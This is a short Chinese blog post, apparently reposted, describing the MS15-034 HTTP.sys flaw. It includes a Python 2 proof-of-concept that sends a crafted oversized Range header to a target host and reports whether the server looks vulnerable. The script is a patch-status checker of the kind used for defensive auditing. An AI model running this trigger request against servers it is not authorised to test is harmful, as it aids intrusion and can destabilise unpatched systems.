HTTP.sys远程执行代码漏洞

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

官方文档：https://technet.microsoft.com/zh-cn/library/security/MS15-034

POC(python2)：

 1 #!/usr/bin/env python
 2 #-*-coding:utf-8-*-
 3 
 4 import socket
 5 import random
 6 
 7 ipAddr = raw_input("Please set your target:")
 8 hexAllFfff = "18446744073709551615"
 9 req1 = "GET / HTTP/1.0\r\n\r\n"
10 req = "GET /  HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
11 
12 print "[*] Audit Started"
13 
14 try:
15                 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16                 client_socket.connect((ipAddr, 80))
17                 client_socket.send(req1)
18                 boringResp = client_socket.recv(1024)
19                 if "Microsoft" not in boringResp:
20                                 print "[*] Not IIS"
21                                 exit(0)
22                 client_socket.close()
23                 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
24                 client_socket.connect((ipAddr, 80))
25                 client_socket.send(req)
26                 goodResp = client_socket.recv(1024)
27                 if "Requested Range Not Satisfiable" in goodResp:
28                                 print "[!!] Looks VULN"
29                 elif " The request has an invalid header name" in goodResp:
30                                 print "[*] Looks Patched"
31                 else:
32                                 print "[*] Unexpected response, cannot discern patch status"
33                                 
34 except Exception,e:
35                 print e

 

来源：oschina

链接：https://my.oschina.net/u/4381341/blog/3927592